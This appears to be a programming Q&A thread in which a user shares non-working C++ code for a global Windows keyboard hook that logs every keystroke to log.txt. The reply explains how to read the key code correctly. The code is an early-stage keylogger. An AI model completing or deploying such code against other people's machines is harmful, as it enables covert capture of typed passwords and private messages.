# Global Keyboard Hook not working

Tags: c++

I have been trying to make a Global Keyboard hook program in visual C++ that write keystrokes in file "log.txt"..I am new to windows programming and i have gone through the msdn library to get an understanding of hooks....I think i have understood the concept theoretically but when i implement the code it doesn't work..The compiler doesn't show any error in both the DLL file and EXE file....Moreover the "Log.txt" file never gets created...
Here are the code files

First Dll file:

```
    #include<windows.h>
     #include<stdio.h>

HHOOK g_hhk;

__declspec(dllexport) LRESULT CALLBACK KeyProc(int nCode, WPARAM wParam, LPARAM lParam)
{
        if(nCode>=0)
         {
          char ch;
         FILE *fp;
         fp=fopen("log.txt","a");
         if((wParam==VK_SPACE)||(wParam==VK_RETURN)||(wParam>=0x2f ) &&(wParam<=0x100))
         {
         if(wParam==VK_RETURN)
        ch='\n';
        fwrite(&ch,1,1,fp);
    }
    else
    {
        BYTE ks[256];
        GetKeyboardState(ks);

        WORD w;

        UINT scan;

        scan=0;

        ToAscii(wParam,scan,ks,&w,0);

        ch =char(w);

        fwrite(&ch,1,1,fp);  // copy character to log file
    }
    fclose(fp);
    }
       return CallNextHookEx(g_hhk, nCode, wParam, lParam);
       }

Now the EXE file:

    #include<windows.h>

HOOKPROC hkprckb;
static HINSTANCE hinstDLL; 
static HHOOK hhookkb;

int WINAPI WinMain(HINSTANCE hInstance1,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
{
    hinstDLL=LoadLibrary(TEXT("C:\\Documents and Settings\\Attar Singh\\My Documents\\Visual Studio 2008\\Projects\\key\\Debug\\key.dll"));
    hkprckb=(HOOKPROC)GetProcAddress(hinstDLL,"KeyProc");
    hhookkb=SetWindowsHookEx( 
                    WH_KEYBOARD_LL,
                    hkprckb,
                    hinstDLL,
                    0); 


    MessageBox(NULL,NULL,NULL,MB_OK);
    return 1;
}
```

This program is giving me nightmares...Any sort of help will be greatly appreciated...Thanks in Advance...

Comment: This question might be useful to you: http://stackoverflow.com/questions/454477/global-hook-setwindowshookex/454503#454503

Answer (score 1):

wParam is supposed to have one of the following values:
`WM_KEYDOWN`, `WM_KEYUP`, `WM_SYSKEYDOWN`, or `WM_SYSKEYUP`.

To get the virtual key code of the key pressed you have to use: `((KBDLLHOOKSTRUCT*)lParam)->vkCode`